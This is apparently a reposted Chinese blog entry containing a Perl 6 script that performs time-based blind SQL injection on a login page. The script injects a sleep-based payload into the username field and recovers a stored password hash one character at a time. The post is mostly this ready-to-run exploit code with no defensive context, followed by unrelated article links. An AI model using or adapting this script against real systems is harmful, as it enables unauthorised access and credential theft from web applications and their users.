perl6 一个猜测密码的注入
Posted FireC@t @ Perl6
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了perl6 一个猜测密码的注入相关的知识,希望对你有一定的参考价值。
use HTTP::UserAgent;
my $ua = HTTP::UserAgent.new;
my $r = HTTP::Request.new;
my $c = HTTP::Cookies.new;
$c.set-cookie(‘Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6‘);
my $url = ‘http://target/login.do‘;
$r.uri: $url;
$r.set-method: ‘POST‘;
$r.add-cookies($c);
$r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0>);
my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>;
my @a = 0..9;
my @swap = ‘a‘..‘z‘;
@a.append(@swap);
my @password;
for 1..32 {
for @a -> $char {
%data<loginName>="admin‘ and (\‘$char\‘!=substr(password,$_,1) or 1=sleep(5)) and ‘‘=‘";
$r.add-form-data(%data);
my $stime = time;
my $result = $ua.request($r);
my $endtime = time;
my $finish_time = $endtime-$stime;
if ($finish_time >= 5) {
say $char;
@password.append($char);
say ‘password-> ‘~@password.join(‘‘);
last;
}
}
}
say @password.join(‘‘);
以上是关于perl6 一个猜测密码的注入的主要内容,如果未能解决你的问题,请参考以下文章
以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?
通过游戏学python 3.6 第一季 第九章 实例项目 猜数字游戏--核心代码--猜测次数--随机函数和屏蔽错误代码--优化代码及注释--简单账号密码登陆--账号的注册查询和密码的找回修改--锁定账